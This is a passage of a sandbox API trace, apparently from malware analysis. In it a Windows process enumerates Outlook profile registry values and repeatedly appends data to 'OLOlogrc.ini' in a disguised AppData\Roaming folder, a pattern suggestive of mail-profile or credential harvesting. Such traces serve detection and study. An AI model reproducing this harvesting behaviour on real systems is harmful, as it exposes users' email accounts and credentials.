IoStatusBlock=0x24d4d8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d4d8, FileInformation=0x24d430, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d4d8, FileInformation=0x24d430) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d4d8, Buffer=0x106960*, Length=0x4, ByteOffset=0x24d448*=422, Key=0x0 | out: IoStatusBlock=0x24d4d8, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] NtClose (Handle=0xa8) returned 0x0 [0106.808] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x0 [0106.808] NtCreateKey (in: KeyHandle=0x24e180, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e180*=0xa8) returned 0x0 [0106.808] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=426, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 [0106.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.809] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.809] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.809] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x52, ByteOffset=0x24d3b0*=438, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 [0106.809] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.809] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.809] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.809] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=520, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 [0106.816] RtlIntegerToChar (in: Value=0x797dbfb2, Base=0x0, Length=0x20, String=0x24d498 | out: String="2038284210") returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=538, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.816] NtClose (Handle=0xac) returned 0x0 [0106.816] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=562, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.816] NtClose (Handle=0xac) returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x24, ByteOffset=0x24d3b0*=588, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=624, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x16, ByteOffset=0x24d3b0*=650, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=672, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x24, ByteOffset=0x24d3b0*=684, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.818] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=720, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.818] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.818] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.818] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=744, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.818] NtClose (Handle=0xac) returned 0x0 [0106.818] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=760, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x10, ByteOffset=0x24d3b0*=784, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.819] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.819] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=800, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.819] NtClose (Handle=0xac) returned 0x0 [0106.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.819] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, 